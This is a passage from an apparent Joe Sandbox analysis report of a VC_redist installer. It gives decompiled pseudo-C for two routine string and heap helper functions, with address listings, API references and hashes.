									_t28 = _a4;
									if(_t38 == 0) {
										_t38 =  *_t28;
										 *_t28 =  *_t28 & 0x00000000;
										 *((short*)(_t38 + _v12 * 2)) = 0;
									}
									_t32 = _t32 + _t32;
									_t42 = E000B143C(_t28, _t32, _a8);
									if(_t42 >= 0) {
										_t42 = 1;
										goto L11;
									}
								}
								break;
								L11:
							} while (_t42 == 1);
							_t26 = _t38;
							_v8 = _t38;
							_t39 = _v16;
							if(_t26 != 0) {
								if(_a8 != 0) {
									_t34 = _t26;
									if(_t39 != 0) {
										do {
											 *_t34 = 0;
											_t34 = _t34 + 1;
											_t39 = _t39 - 1;
										} while (_t39 != 0);
									}
								}
								E000B3999(_t26);
							}
						} else {
							goto L4;
						}
					} else {
						_t42 = 0x80070057;
					}
				}
				return _t42;
			}

















                                                                          0x000b1366
                                                                          0x000b136c
                                                                          0x000b1372
                                                                          0x000b1375
                                                                          0x000b137a
                                                                          0x000b13a8
                                                                          0x000b13ab
                                                                          0x000b13b2
                                                                          0x000b13b7
                                                                          0x000b13bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b137c
                                                                          0x000b1383
                                                                          0x000b1385
                                                                          0x000b138b
                                                                          0x000b139b
                                                                          0x000b13a1
                                                                          0x000b13a3
                                                                          0x000b13a6
                                                                          0x000b13bd
                                                                          0x000b13bd
                                                                          0x000b13c0
                                                                          0x000b13d1
                                                                          0x000b13d9
                                                                          0x00000000
                                                                          0x000b13db
                                                                          0x000b13db
                                                                          0x000b13e0
                                                                          0x000b13e2
                                                                          0x000b13e7
                                                                          0x000b13ec
                                                                          0x000b13ec
                                                                          0x000b13f3
                                                                          0x000b13fc
                                                                          0x000b1400
                                                                          0x000b1404
                                                                          0x00000000
                                                                          0x000b1404
                                                                          0x000b1400
                                                                          0x00000000
                                                                          0x000b1405
                                                                          0x000b1405
                                                                          0x000b140a
                                                                          0x000b140c
                                                                          0x000b140f
                                                                          0x000b1414
                                                                          0x000b141a
                                                                          0x000b141c
                                                                          0x000b1420
                                                                          0x000b1422
                                                                          0x000b1422
                                                                          0x000b1425
                                                                          0x000b1426
                                                                          0x000b1426
                                                                          0x000b1422
                                                                          0x000b1420
                                                                          0x000b142c
                                                                          0x000b142c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b138d
                                                                          0x000b138d
                                                                          0x000b138d
                                                                          0x000b138b
                                                                          0x000b1439

                                                                          APIs
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?), ref: 000B139B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 155fef6a26517d97b8ced305af350876fe2dc4f20cd7ad30a8452ab9b1f9e74d
                                                                          • Instruction ID: 0e82e11fd083eb1041a8fd08e809dfc81d4c96a4d044b552917800f530457660
                                                                          • Opcode Fuzzy Hash: 155fef6a26517d97b8ced305af350876fe2dc4f20cd7ad30a8452ab9b1f9e74d
                                                                          • Instruction Fuzzy Hash: 5C210532D00214EFCB129F68D850BEEB7F9EF84760FA58169ED50AB251D7319E119BC0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B14B2 Relevance: 1.3, APIs: 1, Instructions: 54stringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000B14B2(unsigned int _a4, WCHAR* _a8, unsigned int _a12, intOrPtr _a16) {
				unsigned int _t9;
				signed int _t10;
				signed int _t13;
				signed int _t14;
				unsigned int _t15;
				void* _t16;
				unsigned int _t18;
				unsigned int _t20;
				unsigned int _t21;

				_t9 = _a4;
				_t20 = 0;
				_t14 = _t13 | 0xffffffff;
				if( *_t9 == 0) {
					L4:
					_t18 = _a12;
					if(_t18 == 0) {
						_t9 = lstrlenW(_a8);
						_t18 = _t9;
					}
					_t4 = _t18 + 1; // 0x1
					_t16 = _t4;
					_t15 =  >=  ? _t16 : _t14;
					asm("sbb eax, eax");
					_t10 = _t9 & 0x80070216;
					if(_t16 < _t18) {
						L10:
						return _t10;
					} else {
						if(_t20 >= _t15) {
							L9:
							_t10 = E000B1A6E(_t16,  *_a4, _t20, _a8, _t18, 0, 0, 0x200);
							goto L10;
						}
						_t20 = _t15;
						_t10 = E000B143C(_a4, _t15, _a16); // executed
						if(_t10 < 0) {
							goto L10;
						}
						goto L9;
					}
				}
				_t9 = E000B3B51( *_t9);
				_t21 = _t9;
				if(_t21 != _t14) {
					_t20 = _t21 >> 1;
					goto L4;
				}
				return 0x80070057;
			}












                                                                          0x000b14b5
                                                                          0x000b14ba
                                                                          0x000b14bc
                                                                          0x000b14c1
                                                                          0x000b14d9
                                                                          0x000b14da
                                                                          0x000b14df
                                                                          0x000b14e4
                                                                          0x000b14ea
                                                                          0x000b14ea
                                                                          0x000b14ec
                                                                          0x000b14ec
                                                                          0x000b14f1
                                                                          0x000b14f4
                                                                          0x000b14f6
                                                                          0x000b14fd
                                                                          0x000b152d
                                                                          0x00000000
                                                                          0x000b14ff
                                                                          0x000b1501
                                                                          0x000b1515
                                                                          0x000b1528
                                                                          0x00000000
                                                                          0x000b1528
                                                                          0x000b1506
                                                                          0x000b150c
                                                                          0x000b1513
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b1513
                                                                          0x000b14fd
                                                                          0x000b14c5
                                                                          0x000b14ca
                                                                          0x000b14ce
                                                                          0x000b14d7
                                                                          0x00000000
                                                                          0x000b14d7
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,000B21B8,?,00000000,00000000,00000000,?,000C8A22,00000000,00000000,00000000,00000000), ref: 000B14E4
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 7bb844d91ad419550c5250d0fe316fc847cccb6934d34b85336c25613ba7dcbd
                                                                          • Instruction ID: 92d8b0726f0047d054927bb59f0e441e32120235a3d5f64b95f32731db08f911
                                                                          • Opcode Fuzzy Hash: 7bb844d91ad419550c5250d0fe316fc847cccb6934d34b85336c25613ba7dcbd
                                                                          • Instruction Fuzzy Hash: AB01F137200218AFCF215E64DCA4FEA779AAF81760F618225FA259B161D732AC509AD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%